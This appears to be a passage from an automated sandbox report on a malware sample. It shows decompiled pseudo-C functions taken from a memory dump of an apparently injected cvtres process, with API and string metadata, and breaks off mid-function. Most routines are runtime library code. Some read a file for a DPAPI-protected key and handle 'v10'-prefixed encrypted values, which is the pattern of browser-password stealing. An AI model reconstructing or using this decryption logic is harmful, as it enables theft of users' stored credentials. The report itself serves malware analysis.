                                                                    • Opcode ID: 7a5a08fb16d21dcd184fecacbc8da4d703c0c31949af8d834804a91b9b555785
                                                                    • Instruction ID: 927391ea07966b8c64ce088660c451b2e0fcc7dfa6d47af2e1abd5d2742791d2
                                                                    • Opcode Fuzzy Hash: 7a5a08fb16d21dcd184fecacbc8da4d703c0c31949af8d834804a91b9b555785
                                                                    • Instruction Fuzzy Hash: 8501B1B1900704DECB20EF9A80814CEBBE0BF18314F80C51FE19957241C738A649CB9E
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 79%
                                                                    			E0042C5D9(void* __ecx, void* __edx, intOrPtr* _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
                                                                    				signed int _v8;
                                                                    				int _v12;
                                                                    				void* _v24;
                                                                    				void* __ebx;
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				signed int _t27;
                                                                    				intOrPtr _t33;
                                                                    				int _t37;
                                                                    				void* _t40;
                                                                    				short* _t41;
                                                                    				short* _t47;
                                                                    				void* _t48;
                                                                    				void* _t54;
                                                                    				int _t56;
                                                                    				void* _t57;
                                                                    				void* _t60;
                                                                    				signed int _t61;
                                                                    				short* _t62;
                                                                    
                                                                    				_t54 = __edx;
                                                                    				_push(__ecx);
                                                                    				_push(__ecx);
                                                                    				_t27 =  *0x443674; // 0x393162b1
                                                                    				_v8 = _t27 ^ _t61;
                                                                    				_t47 = 0;
                                                                    				_v12 = 0;
                                                                    				if(_a24 == 0) {
                                                                    					_a24 =  *((intOrPtr*)( *_a4 + 4));
                                                                    				}
                                                                    				_t56 = MultiByteToWideChar(_a24, 1 + (0 | _a28 != _t47) * 8, _a12, _a16, _t47, _t47);
                                                                    				if(_t56 != _t47) {
                                                                    					if(__eflags > 0) {
                                                                    						__eflags = _t56 - 0x7ffffff0;
                                                                    						if(_t56 <= 0x7ffffff0) {
                                                                    							_t16 = _t56 + 8; // 0x8
                                                                    							_t40 = _t56 + _t16;
                                                                    							__eflags = _t40 - 0x400;
                                                                    							if(_t40 > 0x400) {
                                                                    								_t41 = E0041DAE4(_t54, _t56, MultiByteToWideChar, _t40);
                                                                    								__eflags = _t41 - _t47;
                                                                    								if(_t41 != _t47) {
                                                                    									 *_t41 = 0xdddd;
                                                                    									goto L11;
                                                                    								}
                                                                    							} else {
                                                                    								E0042D000(_t40);
                                                                    								_t41 = _t62;
                                                                    								__eflags = _t41 - _t47;
                                                                    								if(_t41 != _t47) {
                                                                    									 *_t41 = 0xcccc;
                                                                    									L11:
                                                                    									_t41 =  &(_t41[4]);
                                                                    									__eflags = _t41;
                                                                    								}
                                                                    							}
                                                                    							_t47 = _t41;
                                                                    						}
                                                                    					}
                                                                    					__eflags = _t47;
                                                                    					if(_t47 == 0) {
                                                                    						goto L3;
                                                                    					} else {
                                                                    						E00426300(_t47, 0, _t56 + _t56);
                                                                    						_t37 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t47, _t56);
                                                                    						__eflags = _t37;
                                                                    						if(_t37 != 0) {
                                                                    							_v12 = GetStringTypeW(_a8, _t47, _t37, _a20);
                                                                    						}
                                                                    						E004217EE(_t47);
                                                                    						_t33 = _v12;
                                                                    					}
                                                                    				} else {
                                                                    					L3:
                                                                    					_t33 = 0;
                                                                    				}
                                                                    				_pop(_t57);
                                                                    				_pop(_t60);
                                                                    				_pop(_t48);
                                                                    				return E0041DA9B(_t33, _t48, _v8 ^ _t61, _t54, _t57, _t60);
                                                                    			}























                                                                    APIs
                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,0000009C,00000000,00000000,00000003,00000001,00000000,?,?,?,0042C6EE,?,00000001,?), ref: 0042C623
                                                                    • _malloc.LIBCMT ref: 0042C658
                                                                    • _memset.LIBCMT ref: 0042C678
                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,?,0000009C,?,00000001,0000009C,?,00000008,00420E8A,0000009C), ref: 0042C68D
                                                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0042C69B
                                                                    • __freea.LIBCMT ref: 0042C6A5
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide$StringType__freea_malloc_memset
                                                                    • String ID:
                                                                    • API String ID: 525495869-0
                                                                    • Opcode ID: 4ace32313dd5e7e433bf2ca4e1ff2a8991a20de20919aba7a71fa066dd06267e
                                                                    • Instruction ID: f36e6f9a826ddab8d2244165479cc84c1ad4f24476773474cd718a627f3fb3b8
                                                                    • Opcode Fuzzy Hash: 4ace32313dd5e7e433bf2ca4e1ff2a8991a20de20919aba7a71fa066dd06267e
                                                                    • Instruction Fuzzy Hash: 9831BFB160021AAFDF109F65ECC0DAF7BA9EF48358FA1002AF900D6250D738DD609B68
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 66%
                                                                    			E0040E4EC(void** __ebx, long* __esi, CHAR* _a4) {
                                                                    				void* _v8;
                                                                    				long _v12;
                                                                    				intOrPtr _v16;
                                                                    				long _v20;
                                                                    				void* _t12;
                                                                    				long _t16;
                                                                    				void* _t17;
                                                                    				signed int _t26;
                                                                    
                                                                    				_t26 = 0;
                                                                    				_t12 = CreateFileA(_a4, 0x80000000, 1, 0, 3, 0, 0);
                                                                    				_v8 = _t12;
                                                                    				if(_t12 == 0 || _t12 == 0xffffffff) {
                                                                    					L8:
                                                                    					return _t26;
                                                                    				} else {
                                                                    					_push( &_v20);
                                                                    					_push(_t12);
                                                                    					if( *0x446274() != 0 && _v16 == 0) {
                                                                    						_t16 = _v20;
                                                                    						 *__esi = _t16;
                                                                    						_t17 = LocalAlloc(0x40, _t16);
                                                                    						 *__ebx = _t17;
                                                                    						if(_t17 != 0) {
                                                                    							_t26 = ReadFile(_v8, _t17,  *__esi,  &_v12, 0) & (0 |  *__esi == _v12);
                                                                    							if(_t26 == 0) {
                                                                    								LocalFree( *__ebx);
                                                                    							}
                                                                    						}
                                                                    					}
                                                                    					CloseHandle(_v8);
                                                                    					goto L8;
                                                                    				}
                                                                    			}












                                                                    APIs
                                                                    • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 0040E504
                                                                    • GetFileSizeEx.KERNEL32(00000000,?), ref: 0040E51B
                                                                    • LocalAlloc.KERNEL32(00000040,?), ref: 0040E532
                                                                    • ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 0040E549
                                                                    • LocalFree.KERNEL32(?), ref: 0040E561
                                                                    • CloseHandle.KERNEL32(?), ref: 0040E56A
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                                                    • String ID:
                                                                    • API String ID: 2311089104-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 90%
                                                                    			E004224E4(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                    				intOrPtr _t48;
                                                                    				intOrPtr _t57;
                                                                    				void* _t58;
                                                                    				void* _t61;
                                                                    
                                                                    				_t61 = __eflags;
                                                                    				_t53 = __edx;
                                                                    				_push(0x2c);
                                                                    				_push(0x4407d8);
                                                                    				E00427300(__ebx, __edi, __esi);
                                                                    				_t48 = __ecx;
                                                                    				_t55 =  *((intOrPtr*)(_t58 + 0xc));
                                                                    				_t57 =  *((intOrPtr*)(_t58 + 8));
                                                                    				 *((intOrPtr*)(_t58 - 0x1c)) = __ecx;
                                                                    				 *(_t58 - 0x34) =  *(_t58 - 0x34) & 0x00000000;
                                                                    				 *((intOrPtr*)(_t58 - 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t58 + 0xc)) - 4));
                                                                    				 *((intOrPtr*)(_t58 - 0x28)) = E004206D0(_t58 - 0x3c,  *((intOrPtr*)(_t57 + 0x18)));
                                                                    				 *((intOrPtr*)(_t58 - 0x2c)) =  *((intOrPtr*)(E00425F05(__ecx, __edx, _t61) + 0x88));
                                                                    				 *((intOrPtr*)(_t58 - 0x30)) =  *((intOrPtr*)(E00425F05(_t48, __edx, _t61) + 0x8c));
                                                                    				 *((intOrPtr*)(E00425F05(_t48, _t53, _t61) + 0x88)) = _t57;
                                                                    				 *((intOrPtr*)(E00425F05(_t48, _t53, _t61) + 0x8c)) =  *((intOrPtr*)(_t58 + 0x10));
                                                                    				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
                                                                    				 *((intOrPtr*)(_t58 + 0x10)) = 1;
                                                                    				 *(_t58 - 4) = 1;
                                                                    				 *((intOrPtr*)(_t58 - 0x1c)) = E00420775(_t55,  *((intOrPtr*)(_t58 + 0x14)), _t48,  *((intOrPtr*)(_t58 + 0x18)),  *((intOrPtr*)(_t58 + 0x1c)));
                                                                    				 *(_t58 - 4) =  *(_t58 - 4) & 0x00000000;
                                                                    				 *(_t58 - 4) = 0xfffffffe;
                                                                    				 *((intOrPtr*)(_t58 + 0x10)) = 0;
                                                                    				E0042260A(_t48, _t53, _t55, _t57, _t61);
                                                                    				return E00427345( *((intOrPtr*)(_t58 - 0x1c)));
                                                                    			}








                                                                    APIs
                                                                    • __CreateFrameInfo.LIBCMT ref: 0042250C
                                                                      • Part of subcall function 004206D0: __getptd.LIBCMT ref: 004206DE
                                                                      • Part of subcall function 004206D0: __getptd.LIBCMT ref: 004206EC
                                                                    • __getptd.LIBCMT ref: 00422516
                                                                      • Part of subcall function 00425F05: __getptd_noexit.LIBCMT ref: 00425F08
                                                                      • Part of subcall function 00425F05: __amsg_exit.LIBCMT ref: 00425F15
                                                                    • __getptd.LIBCMT ref: 00422524
                                                                    • __getptd.LIBCMT ref: 00422532
                                                                    • __getptd.LIBCMT ref: 0042253D
                                                                    • _CallCatchBlock2.LIBCMT ref: 00422563
                                                                      • Part of subcall function 00420775: __CallSettingFrame@12.LIBCMT ref: 004207C1
                                                                      • Part of subcall function 0042260A: __getptd.LIBCMT ref: 00422619
                                                                      • Part of subcall function 0042260A: __getptd.LIBCMT ref: 00422627
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                    • String ID:
                                                                    • API String ID: 1602911419-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 81%
                                                                    			E0042555B(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                    				signed int _t15;
                                                                    				LONG* _t21;
                                                                    				void* _t31;
                                                                    				LONG* _t33;
                                                                    				void* _t34;
                                                                    				void* _t35;
                                                                    
                                                                    				_t35 = __eflags;
                                                                    				_t29 = __edx;
                                                                    				_t25 = __ebx;
                                                                    				_push(0xc);
                                                                    				_push(0x4408b8);
                                                                    				E00427300(__ebx, __edi, __esi);
                                                                    				_t31 = E00425F05(__ebx, __edx, _t35);
                                                                    				_t15 =  *0x443bb0; // 0xfffffffe
                                                                    				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
                                                                    					E004279D9(_t25, _t31, 0xd);
                                                                    					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
                                                                    					_t33 =  *(_t31 + 0x68);
                                                                    					 *(_t34 - 0x1c) = _t33;
                                                                    					__eflags = _t33 -  *0x443ab8; // 0x4be1620
                                                                    					if(__eflags != 0) {
                                                                    						__eflags = _t33;
                                                                    						if(__eflags != 0) {
                                                                    							__eflags = InterlockedDecrement(_t33);
                                                                    							if(__eflags == 0) {
                                                                    								__eflags = _t33 - 0x443690;
                                                                    								if(__eflags != 0) {
                                                                    									E0041DAAA(_t33);
                                                                    								}
                                                                    							}
                                                                    						}
                                                                    						_t21 =  *0x443ab8; // 0x4be1620
                                                                    						 *(_t31 + 0x68) = _t21;
                                                                    						_t33 =  *0x443ab8; // 0x4be1620
                                                                    						 *(_t34 - 0x1c) = _t33;
                                                                    						InterlockedIncrement(_t33);
                                                                    					}
                                                                    					 *(_t34 - 4) = 0xfffffffe;
                                                                    					E004255F6();
                                                                    				} else {
                                                                    					_t33 =  *(_t31 + 0x68);
                                                                    				}
                                                                    				_t38 = _t33;
                                                                    				if(_t33 == 0) {
                                                                    					_push(0x20);
                                                                    					E004233A7(_t29, _t38);
                                                                    				}
                                                                    				return E00427345(_t33);
                                                                    			}










                                                                    APIs
                                                                    • __getptd.LIBCMT ref: 00425567
                                                                      • Part of subcall function 00425F05: __getptd_noexit.LIBCMT ref: 00425F08
                                                                      • Part of subcall function 00425F05: __amsg_exit.LIBCMT ref: 00425F15
                                                                    • __amsg_exit.LIBCMT ref: 00425587
                                                                    • __lock.LIBCMT ref: 00425597
                                                                    • InterlockedDecrement.KERNEL32(?), ref: 004255B4
                                                                    • _free.LIBCMT ref: 004255C7
                                                                    • InterlockedIncrement.KERNEL32(04BE1620), ref: 004255DF
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                    • String ID:
                                                                    • API String ID: 3470314060-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 94%
                                                                    			E0040DFD3(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                    				intOrPtr _t39;
                                                                    				void* _t40;
                                                                    
                                                                    				_push(0);
                                                                    				E004207D5(E004337BA, __ebx, __edi, __esi);
                                                                    				_t39 =  *((intOrPtr*)(_t40 + 8));
                                                                    				 *(_t40 - 4) = 4;
                                                                    				E0041D371(_t39);
                                                                    				_t20 =  *(_t39 + 0x1c);
                                                                    				if( *(_t39 + 0x1c) != 0) {
                                                                    					E0041DAAA(_t20);
                                                                    				}
                                                                    				 *(_t39 + 0x1c) =  *(_t39 + 0x1c) & 0x00000000;
                                                                    				_t21 =  *(_t39 + 0x14);
                                                                    				if( *(_t39 + 0x14) != 0) {
                                                                    					E0041DAAA(_t21);
                                                                    				}
                                                                    				 *(_t39 + 0x14) =  *(_t39 + 0x14) & 0x00000000;
                                                                    				_t22 =  *(_t39 + 0xc);
                                                                    				if( *(_t39 + 0xc) != 0) {
                                                                    					E0041DAAA(_t22);
                                                                    				}
                                                                    				 *(_t39 + 0xc) =  *(_t39 + 0xc) & 0x00000000;
                                                                    				_t23 =  *(_t39 + 4);
                                                                    				if( *(_t39 + 4) != 0) {
                                                                    					E0041DAAA(_t23);
                                                                    				}
                                                                    				 *(_t39 + 4) =  *(_t39 + 4) & 0x00000000;
                                                                    				 *(_t40 - 4) =  *(_t40 - 4) | 0xffffffff;
                                                                    				return E00420874(E0041D5E5(_t39));
                                                                    			}






                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 0040DFDA
                                                                    • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0040DFEA
                                                                      • Part of subcall function 0041D371: _setlocale.LIBCMT ref: 0041D383
                                                                    • _free.LIBCMT ref: 0040DFF8
                                                                      • Part of subcall function 0041DAAA: HeapFree.KERNEL32(00000000,00000000,?,00425EF6,00000000,?,?,0042214C,0041DB6D,?,?,00403F3E,00000010), ref: 0041DAC0
                                                                      • Part of subcall function 0041DAAA: GetLastError.KERNEL32(00000000,?,00425EF6,00000000,?,?,0042214C,0041DB6D,?,?,00403F3E,00000010), ref: 0041DAD2
                                                                    • _free.LIBCMT ref: 0040E00A
                                                                    • _free.LIBCMT ref: 0040E01C
                                                                    • _free.LIBCMT ref: 0040E02E
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _free$ErrorFreeH_prolog3HeapLastLocinfo::_Locinfo_dtor_setlocalestd::_
                                                                    • String ID:
                                                                    • API String ID: 2259855018-0
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 86%
                                                                    			E0040E6CB(void* __ebx, intOrPtr __ecx, char* __edi, void* __esi, void* __eflags) {
                                                                    				intOrPtr _t50;
                                                                    				void* _t68;
                                                                    				char* _t74;
                                                                    				void* _t78;
                                                                    				void* _t82;
                                                                    
                                                                    				_t79 = __edi;
                                                                    				_push(0x38);
                                                                    				E0042083E(E00433AA8, __ebx, __edi, __esi);
                                                                    				 *(_t82 - 0x38) =  *(_t82 - 0x38) & 0x00000000;
                                                                    				 *((intOrPtr*)(_t82 - 0x40)) = __ecx;
                                                                    				_t81 = _t82 - 0x30;
                                                                    				_t61 = _t82 - 0x34;
                                                                    				 *((intOrPtr*)(_t82 - 0x44)) =  *((intOrPtr*)(_t82 + 0xc));
                                                                    				if(E0040E4EC(_t82 - 0x34, _t82 - 0x30,  *((intOrPtr*)(_t82 + 8))) == 0) {
                                                                    					L19:
                                                                    					return E00420888(_t61, _t79, _t81);
                                                                    				}
                                                                    				_t61 = 0;
                                                                    				if( *((intOrPtr*)(_t82 - 0x34)) == 0) {
                                                                    					goto L19;
                                                                    				}
                                                                    				_t81 =  *(_t82 - 0x30);
                                                                    				if(_t81 == 0) {
                                                                    					goto L19;
                                                                    				}
                                                                    				_t79 = LocalAlloc(0x40, _t81 + 1);
                                                                    				if(_t79 == 0) {
                                                                    					goto L19;
                                                                    				}
                                                                    				if(_t81 <= 0) {
                                                                    					L7:
                                                                    					if(StrStrA(_t79,  *0x445dac) == _t61) {
                                                                    						goto L19;
                                                                    					}
                                                                    					_t65 = _t82 - 0x2c;
                                                                    					 *((intOrPtr*)(_t82 - 0x18)) = 0xf;
                                                                    					 *((intOrPtr*)(_t82 - 0x1c)) = _t61;
                                                                    					 *((char*)(_t82 - 0x2c)) = _t61;
                                                                    					E00404331(_t82 - 0x2c, _t45 + 0x1d);
                                                                    					 *((intOrPtr*)(_t82 - 4)) = _t61;
                                                                    					if(E0040C00F(_t82 - 0x2c, "\"}", _t61) != 0xffffffff) {
                                                                    						_t65 = _t82 - 0x2c;
                                                                    						E0040453E(_t82 - 0x2c, _t49, 0xffffffff);
                                                                    					}
                                                                    					_t50 =  *((intOrPtr*)(_t82 - 0x2c));
                                                                    					if( *((intOrPtr*)(_t82 - 0x18)) < 0x10) {
                                                                    						_t50 = _t82 - 0x2c;
                                                                    					}
                                                                    					_t79 = _t82 - 0x3c;
                                                                    					_t61 = _t82 - 0x30;
                                                                    					if(E0040E575(_t82 - 0x30, _t65, _t82 - 0x3c, _t50) != 0) {
                                                                    						_t75 =  *(_t82 - 0x3c);
                                                                    						_t68 = 5;
                                                                    						if( *(_t82 - 0x3c) >= _t68) {
                                                                    							_t53 =  *(_t82 - 0x30);
                                                                    							_t79 = 0x43d00c;
                                                                    							_t81 =  *(_t82 - 0x30);
                                                                    							_t61 = 0;
                                                                    							asm("repe cmpsb");
                                                                    							if(0 == 0) {
                                                                    								_t79 = _t82 - 0x30;
                                                                    								if(E0040E5CE(_t53 + 5, _t82 - 0x30, _t75 + 0xfffffffb, _t82 - 0x34) != 0 &&  *(_t82 - 0x30) == 0x20) {
                                                                    									 *(_t82 - 0x38) = 1;
                                                                    									E0040E661( *((intOrPtr*)(_t82 - 0x44)),  *((intOrPtr*)(_t82 - 0x40)),  *((intOrPtr*)(_t82 - 0x34)));
                                                                    								}
                                                                    							}
                                                                    						}
                                                                    					}
                                                                    					E00404354(_t82 - 0x2c, 1, 0);
                                                                    					goto L19;
                                                                    				} else {
                                                                    					_t74 = _t79;
                                                                    					_t78 =  *((intOrPtr*)(_t82 - 0x34)) - _t79;
                                                                    					do {
                                                                    						 *_t74 =  *((intOrPtr*)(_t78 + _t74));
                                                                    						_t74 =  &(_t74[1]);
                                                                    						_t81 = _t81 - 1;
                                                                    					} while (_t81 != 0);
                                                                    					goto L7;
                                                                    				}
                                                                    			}









                                                                    APIs
                                                                    • __EH_prolog3_GS.LIBCMT ref: 0040E6D2
                                                                      • Part of subcall function 0040E4EC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 0040E504
                                                                      • Part of subcall function 0040E4EC: GetFileSizeEx.KERNEL32(00000000,?), ref: 0040E51B
                                                                      • Part of subcall function 0040E4EC: LocalAlloc.KERNEL32(00000040,?), ref: 0040E532
                                                                      • Part of subcall function 0040E4EC: ReadFile.KERNEL32(?,00000000,?,?,00000000), ref: 0040E549
                                                                      • Part of subcall function 0040E4EC: LocalFree.KERNEL32(?), ref: 0040E561
                                                                      • Part of subcall function 0040E4EC: CloseHandle.KERNEL32(?), ref: 0040E56A
                                                                    • LocalAlloc.KERNEL32(00000040,?,00000038,004088FC,?,?,00000001,00000000,00000001), ref: 0040E718
                                                                    • StrStrA.SHLWAPI(00000000), ref: 0040E743
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: FileLocal$Alloc$CloseCreateFreeH_prolog3_HandleReadSize
                                                                    • String ID: $DPAPI
                                                                    • API String ID: 2927704599-1819349886
                                                                    • Opcode ID: feb0dd7a4c08f04702d763bdba0a441384657e9fdaf4ccebeb5b21a9fe20b4f1
                                                                    • Instruction ID: 10560db6e106e76c707617d249395efee4377079e00630e1da913ad824ff6f7d
                                                                    • Opcode Fuzzy Hash: feb0dd7a4c08f04702d763bdba0a441384657e9fdaf4ccebeb5b21a9fe20b4f1
                                                                    • Instruction Fuzzy Hash: C041D032D00219AFDF14EFAAE881ADEB7B5AF44310F50853AF220B72D1CB385945CB59
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 57%
                                                                    			E0040E874(char* __ebx, intOrPtr __ecx, long __edx, void* __edi, void* __esi, void* __eflags) {
                                                                    				intOrPtr _t48;
                                                                    				intOrPtr _t58;
                                                                    				long _t60;
                                                                    				void* _t64;
                                                                    				char* _t68;
                                                                    				void* _t70;
                                                                    				intOrPtr _t74;
                                                                    				int _t84;
                                                                    				void* _t86;
                                                                    
                                                                    				_t81 = __edi;
                                                                    				_t68 = __ebx;
                                                                    				_push(0x74);
                                                                    				E0042083E(E00433A78, __ebx, __edi, __esi);
                                                                    				_t48 =  *((intOrPtr*)(_t86 + 8));
                                                                    				 *(_t86 - 0x3c) =  *(_t86 - 0x3c) & 0x00000000;
                                                                    				 *((intOrPtr*)(_t86 - 0x34)) = __ecx;
                                                                    				_t70 = 3;
                                                                    				_t83 = __edx;
                                                                    				 *(_t86 - 0x30) = __edx;
                                                                    				 *((intOrPtr*)(_t86 - 0x38)) = _t48;
                                                                    				if(_t48 < _t70) {
                                                                    					L10:
                                                                    					E004042A9(_t68, E0040E80D(_t48,  *(_t86 - 0x30), 0));
                                                                    				} else {
                                                                    					_t81 = 0x43ca74;
                                                                    					asm("repe cmpsb");
                                                                    					if(0 != 0) {
                                                                    						goto L10;
                                                                    					} else {
                                                                    						if( *((intOrPtr*)(_t86 + 0xc)) == 0 ||  *((intOrPtr*)(_t86 - 0x34)) == 0) {
                                                                    							 *((intOrPtr*)(_t68 + 0x14)) = 0xf;
                                                                    							 *((intOrPtr*)(_t68 + 0x10)) = 0;
                                                                    							 *_t68 = 0;
                                                                    							goto L8;
                                                                    						} else {
                                                                    							_t84 = 0x40;
                                                                    							E00426300(_t86 - 0x80, 0, _t84);
                                                                    							_t74 =  *((intOrPtr*)(_t86 - 0x38));
                                                                    							_t58 =  *(_t86 - 0x30) + 3;
                                                                    							 *((intOrPtr*)(_t86 - 0x78)) = _t58;
                                                                    							 *((intOrPtr*)(_t86 - 0x68)) = _t74 + _t58 - 0x13;
                                                                    							_t60 = _t74 - 0x1f;
                                                                    							 *(_t86 - 0x80) = _t84;
                                                                    							 *((intOrPtr*)(_t86 - 0x7c)) = 1;
                                                                    							 *((intOrPtr*)(_t86 - 0x74)) = 0xc;
                                                                    							 *((intOrPtr*)(_t86 - 0x64)) = 0x10;
                                                                    							 *(_t86 - 0x30) = _t60;
                                                                    							_t81 = LocalAlloc(_t84, _t60);
                                                                    							_t83 = 0;
                                                                    							if(_t81 == 0) {
                                                                    								L7:
                                                                    								 *((intOrPtr*)(_t68 + 0x14)) = 0xf;
                                                                    								 *((intOrPtr*)(_t68 + 0x10)) = _t83;
                                                                    								 *_t68 = 0;
                                                                    								L8:
                                                                    								E00404331(_t68, "NULL");
                                                                    							} else {
                                                                    								_t64 =  *0x446470( *((intOrPtr*)(_t86 - 0x34)),  *((intOrPtr*)(_t86 - 0x74)) +  *((intOrPtr*)(_t86 - 0x78)),  *(_t86 - 0x30), _t86 - 0x80, 0, 0, _t81,  *(_t86 - 0x30), _t86 - 0x30, 0);
                                                                    								_t95 = _t64;
                                                                    								if(_t64 < 0) {
                                                                    									goto L7;
                                                                    								} else {
                                                                    									 *(_t86 - 0x1c) =  *(_t86 - 0x1c) & 0x00000000;
                                                                    									_push(0xf);
                                                                    									 *((intOrPtr*)(_t86 - 0x18)) = 0;
                                                                    									 *((char*)(_t86 - 0x2c)) = 0;
                                                                    									E00404396(_t86 - 0x2c, _t95, _t81,  *(_t86 - 0x30));
                                                                    									 *(_t86 - 4) =  *(_t86 - 4) & 0x00000000;
                                                                    									 *(__ebx + 0x10) =  *(__ebx + 0x10) & 0x00000000;
                                                                    									 *((intOrPtr*)(__ebx + 0x14)) = 0;
                                                                    									_t83 = _t86 - 0x2c;
                                                                    									_t81 = __ebx;
                                                                    									 *__ebx = 0;
                                                                    									E004042ED(__ebx, _t86 - 0x2c);
                                                                    									E00404354(_t83, 1, 0);
                                                                    								}
                                                                    							}
                                                                    						}
                                                                    					}
                                                                    				}
                                                                    				return E00420888(_t68, _t81, _t83);
                                                                    			}













                                                                    APIs
                                                                    • __EH_prolog3_GS.LIBCMT ref: 0040E87B
                                                                    • _memset.LIBCMT ref: 0040E8C9
                                                                    • LocalAlloc.KERNEL32 ref: 0040E904
                                                                      • Part of subcall function 004042ED: _memmove.LIBCMT ref: 00404309
                                                                      • Part of subcall function 00404354: _memmove.LIBCMT ref: 00404373
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _memmove$AllocH_prolog3_Local_memset
                                                                    • String ID: NULL$v10
                                                                    • API String ID: 1135815740-1391045996
                                                                    • Opcode ID: 58432bd0f04ea3043ef38e1d9cd93902280b96f67a1fac45a6b3b9fe371299b3
                                                                    • Instruction ID: a1f7995ef2a12b539f63f29eb38db067053ea713943fcdef92890d6481b1d1a8
                                                                    • Opcode Fuzzy Hash: 58432bd0f04ea3043ef38e1d9cd93902280b96f67a1fac45a6b3b9fe371299b3
                                                                    • Instruction Fuzzy Hash: 62415CB1D01228ABDF10DFA6D885BAEBBB9BF44705F10442FF501AB282C7799514CB99
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 74%
                                                                    			E0040A9FD(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                    				void* _t43;
                                                                    				intOrPtr _t46;
                                                                    				intOrPtr _t53;
                                                                    				void* _t57;
                                                                    				intOrPtr _t61;
                                                                    				void* _t65;
                                                                    				void* _t73;
                                                                    				void* _t82;
                                                                    				void* _t83;
                                                                    				void* _t87;
                                                                    
                                                                    				_t87 = __eflags;
                                                                    				_t73 = __edx;
                                                                    				_t65 = __ecx;
                                                                    				_push(0x4c);
                                                                    				E0042083E(E004342C4, __ebx, __edi, __esi);
                                                                    				 *((intOrPtr*)(_t82 - 0x50)) =  *((intOrPtr*)(_t82 + 0x40));
                                                                    				 *((intOrPtr*)(_t82 - 4)) = 0;
                                                                    				 *((intOrPtr*)(_t82 - 0x18)) = 0xf;
                                                                    				 *((intOrPtr*)(_t82 - 0x1c)) = 0;
                                                                    				 *((char*)(_t82 - 0x2c)) = 0;
                                                                    				_t84 = _t83 - 0x1c;
                                                                    				 *((intOrPtr*)(_t82 - 0x58)) = _t83 - 0x1c;
                                                                    				 *((char*)(_t82 - 4)) = 2;
                                                                    				 *((intOrPtr*)(_t82 - 0x4c)) = 0;
